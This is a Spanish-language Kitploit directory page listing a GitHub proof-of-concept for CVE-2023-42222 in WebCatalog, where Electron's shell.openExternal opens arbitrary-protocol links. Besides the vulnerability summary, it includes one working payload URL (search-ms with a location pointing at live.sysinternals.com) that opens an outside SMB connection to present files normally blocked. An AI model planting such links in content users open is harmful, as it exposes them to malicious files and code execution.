Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2023-42222 — Exploit de prueba de concepto para CVE-2023-42222 en WebCatalog, que demuestra la ejecución arbitraria de URL a través de shell.openExternal de Electron para eludir las protecciones de seguridad y ejecutar código. | Kitploit
Herramientas/GitHubGitHub/itssixtyn3in/cve-2023-42222
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPapers e InvestigaciónAprendizaje y Educación
GitHubitssixtyn3in/cve-2023-42222

CVE-2023-42222

Exploit de prueba de concepto para CVE-2023-42222 en WebCatalog, que demuestra la ejecución arbitraria de URL a través de shell.openExternal de Electron para eludir las protecciones de seguridad y ejecutar código.

Ver Repositorio
312hace 2 añosAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2023-42222

Resumen de la vulnerabilidad

WebCatalog anterior a la versión 48.4.0 llama a la función Electron shell.openExternal sin verificar que la URL corresponda a un recurso http o https, en algunas circunstancias. Esta vulnerabilidad permite a un atacante ejecutar código en la máquina de la víctima enviando mensajes que contienen enlaces con protocolos arbitrarios. La víctima debe interactuar con el enlace y ve la URL que se abre.

Salida del escaneo de vulnerabilidades

SAST

Resumen del PoC

PoC

Información del PoC

La vulnerabilidad se puede confirmar sincronizando una página que permita URLs arbitrarias. Si se sincroniza un sitio web que contiene search-ms://query=PsExec.exe&crumb=location://live.sysinternals.com/tools, se crea una conexión SMB externa. Esto puede usarse para eludir las protecciones de seguridad en la máquina local y presentar archivos maliciosos al usuario, que normalmente estarían bloqueados.

Descargar herramienta